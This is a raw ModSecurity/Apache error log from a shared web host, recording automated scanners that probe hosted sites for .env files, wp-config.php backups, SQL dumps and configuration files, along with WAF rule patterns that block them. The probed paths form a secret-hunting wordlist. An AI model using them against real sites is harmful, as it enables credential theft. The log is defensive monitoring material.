[Tue May 26 13:04:29.427648 2026] [security2:error] [pid 485064:tid 485285] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_EgAAAOA"]
[Tue May 26 13:04:29.435152 2026] [security2:error] [pid 485064:tid 485263] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_FwAAAMo"]
[Tue May 26 13:04:29.620488 2026] [security2:error] [pid 485064:tid 485219] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_JAAAAJ4"]
[Tue May 26 13:04:29.636537 2026] [security2:error] [pid 485064:tid 485216] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH--wAAAJs"]
[Tue May 26 13:04:29.814163 2026] [security2:error] [pid 485064:tid 485307] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_MQAAAPY"]
[Tue May 26 13:04:29.982004 2026] [security2:error] [pid 485064:tid 485233] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-7QAArFM"], referer: http://kingsclub.in/composer.json
[Tue May 26 13:04:29.990736 2026] [security2:error] [pid 485064:tid 485221] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-8gAAoEU"], referer: http://kingsclub.in/.gitconfig
[Tue May 26 13:04:29.999350 2026] [security2:error] [pid 485064:tid 485305] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_OwAAAPQ"]
[Tue May 26 13:04:30.041955 2026] [security2:error] [pid 485064:tid 485278] [client 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-_wAA2WI"], referer: http://kingsclub.in/application.yml
[Tue May 26 13:04:30.083540 2026] [security2:error] [pid 485064:tid 485130] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH_BgAA6kE"], referer: http://kingsclub.in/docker-compose.yml
[Tue May 26 13:04:30.200098 2026] [security2:error] [pid 485064:tid 485320] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBj9tlF55stOmSqH_RAAAAQM"]
[Tue May 26 13:04:30.492997 2026] [security2:error] [pid 485064:tid 485149] [remote 91.92.42.86:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahVNBT9tlF55stOmSqH-6wAAxFQ"], referer: http://kingsclub.in/config.js
[Tue May 26 13:04:30.500060 2026] [security2:error] [pid 485064:tid 485223] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBj9tlF55stOmSqH_UgAAAKI"]
[Tue May 26 13:04:30.536201 2026] [security2:error] [pid 485064:tid 485236] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBj9tlF55stOmSqH_WwAAAK8"]
[Tue May 26 13:04:30.822350 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBj9tlF55stOmSqH_ZQAAAN8"]
[Tue May 26 13:04:30.842845 2026] [security2:error] [pid 485064:tid 485259] [client 195.178.110.199:45688] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/v1/.env"] [unique_id "ahVNBj9tlF55stOmSqH_ZgAAAMY"]
[Tue May 26 13:04:31.032340 2026] [security2:error] [pid 485064:tid 485260] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_bQAAAMc"]
[Tue May 26 13:04:31.041288 2026] [security2:error] [pid 485064:tid 485289] [client 195.178.110.199:45664] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/var/www/html/.env"] [unique_id "ahVNBz9tlF55stOmSqH_cQAAAOQ"]
[Tue May 26 13:04:31.057418 2026] [security2:error] [pid 485064:tid 485254] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/web/.env"] [unique_id "ahVNBz9tlF55stOmSqH_cwAAAME"]
[Tue May 26 13:04:31.079262 2026] [security2:error] [pid 485064:tid 485318] [client 195.178.110.199:42442] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_cgAAAQE"]
[Tue May 26 13:04:31.099035 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_dQAAAIw"]
[Tue May 26 13:04:31.210456 2026] [security2:error] [pid 485064:tid 485252] [client 195.178.110.199:45688] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_fQAAAL8"]
[Tue May 26 13:04:31.220081 2026] [security2:error] [pid 485064:tid 485264] [client 195.178.110.199:45664] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_fgAAAMs"]
[Tue May 26 13:04:31.295537 2026] [security2:error] [pid 485064:tid 485276] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_hAAAANc"]
[Tue May 26 13:04:31.311569 2026] [security2:error] [pid 485064:tid 485222] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_hQAAAKE"]
[Tue May 26 13:04:31.397780 2026] [security2:error] [pid 485064:tid 485263] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_jgAAAMo"]
[Tue May 26 13:04:31.406504 2026] [security2:error] [pid 485064:tid 485216] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_kwAAAJs"]
[Tue May 26 13:04:31.565654 2026] [security2:error] [pid 485064:tid 485246] [client 195.178.110.199:42442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/var/www/.env"] [unique_id "ahVNBz9tlF55stOmSqH_mwAAALk"]
[Tue May 26 13:04:31.592658 2026] [security2:error] [pid 485064:tid 485284] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_oAAAAN8"]
[Tue May 26 13:04:31.706675 2026] [security2:error] [pid 485064:tid 485307] [client 195.178.110.199:45780] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_pQAAAPY"]
[Tue May 26 13:04:31.731339 2026] [security2:error] [pid 485064:tid 485203] [client 195.178.110.199:42348] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_pwAAAI4"]
[Tue May 26 13:04:31.732902 2026] [security2:error] [pid 485064:tid 485245] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_qAAAALg"]
[Tue May 26 13:04:31.751216 2026] [security2:error] [pid 485064:tid 485277] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_iAAAANg"]
[Tue May 26 13:04:31.786372 2026] [security2:error] [pid 485064:tid 485256] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_rwAAAMM"]
[Tue May 26 13:04:31.852135 2026] [security2:error] [pid 485064:tid 485201] [client 195.178.110.199:45780] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.new"] [unique_id "ahVNBz9tlF55stOmSqH_swAAAIw"]
[Tue May 26 13:04:31.876020 2026] [security2:error] [pid 485064:tid 485278] [client 195.178.110.199:42348] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.old"] [unique_id "ahVNBz9tlF55stOmSqH_tAAAANk"]
[Tue May 26 13:04:31.935829 2026] [security2:error] [pid 485064:tid 485288] [client 195.178.110.199:45614] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVNBz9tlF55stOmSqH_tQAAAOM"]
[Tue May 26 13:04:31.975323 2026] [security2:error] [pid 485064:tid 485293] [client 195.178.110.199:45538] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_twAAAOg"]
[Tue May 26 13:04:32.023313 2026] [security2:error] [pid 485064:tid 485241] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNBz9tlF55stOmSqH_vQAAALQ"]
[Tue May 26 13:04:32.034720 2026] [security2:error] [pid 485064:tid 485295] [client 195.178.110.199:45750] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_vgAAAOo"]
[Tue May 26 13:04:32.117717 2026] [security2:error] [pid 485064:tid 485296] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_xAAAAOs"]
[Tue May 26 13:04:32.134005 2026] [security2:error] [pid 485064:tid 485274] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_xwAAANU"]
[Tue May 26 13:04:32.177438 2026] [security2:error] [pid 485064:tid 485319] [client 195.178.110.199:42422] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_ygAAAQI"]
[Tue May 26 13:04:32.180048 2026] [security2:error] [pid 485064:tid 485306] [client 195.178.110.199:45688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-config.php"] [unique_id "ahVNCD9tlF55stOmSqH_zAAAAPU"]
[Tue May 26 13:04:32.252789 2026] [security2:error] [pid 485064:tid 485317] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_0wAAAQA"]
[Tue May 26 13:04:32.315326 2026] [security2:error] [pid 485064:tid 485196] [client 195.178.110.199:42384] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "vcresco.com"] [uri "/wp-config.php.bak"] [unique_id "ahVNCD9tlF55stOmSqH_2gAAAIc"]
[Tue May 26 13:04:32.416578 2026] [security2:error] [pid 485064:tid 485210] [client 195.178.110.199:45650] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_4AAAAJU"]
[Tue May 26 13:04:32.504996 2026] [security2:error] [pid 485064:tid 485230] [client 195.178.110.199:45614] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVNCD9tlF55stOmSqH_4wAAAKk"]
[Tue May 26 13:04:32.943552 2026] [security2:error] [pid 485064:tid 485311] [client 195.178.110.199:42442] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/website/.env"] [unique_id "ahVNCD9tlF55stOmSqH_-QAAAPo"]
[Tue May 26 13:04:33.715801 2026] [security2:error] [pid 485064:tid 485301] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNCT9tlF55stOmSqEADAAAAPA"]
[Tue May 26 13:04:35.839235 2026] [security2:error] [pid 485064:tid 485316] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNCz9tlF55stOmSqEAfgAAAP8"]
[Tue May 26 13:04:36.107465 2026] [security2:error] [pid 485064:tid 485275] [client 157.20.138.61:64741] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNDD9tlF55stOmSqEAnwAAANY"]
[Tue May 26 13:04:36.107580 2026] [security2:error] [pid 485064:tid 485275] [client 157.20.138.61:64741] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVNDD9tlF55stOmSqEAnwAAANY"]
[Tue May 26 13:04:36.786520 2026] [ssl:error] [pid 485064:tid 485262] [client 98.84.1.175:8750] AH02032: Hostname md-74.webhostbox.net (default host as no SNI was provided) and hostname cpanel.acacia.org.in provided via HTTP have no compatible SSL setup for policy 'secure'
[Tue May 26 13:04:38.413085 2026] [security2:error] [pid 485064:tid 485218] [client 223.109.255.206:60803] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVNDj9tlF55stOmSqEBEwAAAJ0"], referer: http://pic.sogou.com
[Tue May 26 13:04:39.011892 2026] [security2:error] [pid 485064:tid 485257] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNDj9tlF55stOmSqEBIQAAAMQ"]
[Tue May 26 13:04:40.909721 2026] [security2:error] [pid 485064:tid 485254] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNED9tlF55stOmSqEBgAAAAME"]
[Tue May 26 13:04:41.042604 2026] [security2:error] [pid 485064:tid 485241] [client 43.250.164.247:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVNET9tlF55stOmSqEBtQAAALQ"], referer: https://www.ucdc.co.in/
[Tue May 26 13:04:41.053061 2026] [autoindex:error] [pid 485064:tid 485245] [client 43.250.164.247:0] AH01276: Cannot serve directory /home2/ucdccoin/public_html/upload/slider/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: https://www.ucdc.co.in/
[Tue May 26 13:04:43.013111 2026] [security2:error] [pid 485064:tid 485305] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNEj9tlF55stOmSqEB_wAAAPQ"]
[Tue May 26 13:04:43.590253 2026] [security2:error] [pid 485064:tid 485300] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNEj9tlF55stOmSqEB9gAAAO8"]
[Tue May 26 13:04:43.766654 2026] [security2:error] [pid 485064:tid 485233] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNEz9tlF55stOmSqECQgAAAKw"]
[Tue May 26 13:04:44.911568 2026] [security2:error] [pid 485064:tid 485259] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFD9tlF55stOmSqECcgAAAMY"]
[Tue May 26 13:04:45.277867 2026] [security2:error] [pid 485064:tid 485203] [client 144.217.135.217:52327] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqEChQAAAI4"], referer: http://www.plenitudotonal.com/ads.txt
[Tue May 26 13:04:45.510751 2026] [security2:error] [pid 485064:tid 485319] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqEChgAAAQI"]
[Tue May 26 13:04:45.627836 2026] [security2:error] [pid 485064:tid 485277] [client 144.217.135.217:43939] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqECkwAAANg"]
[Tue May 26 13:04:45.977180 2026] [security2:error] [pid 485064:tid 485211] [client 144.217.135.217:39331] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "plenitudotonal.com"] [uri "/index.php"] [unique_id "ahVNFT9tlF55stOmSqECqAAAAJY"], referer: http://www.plenitudotonal.com/security.txt
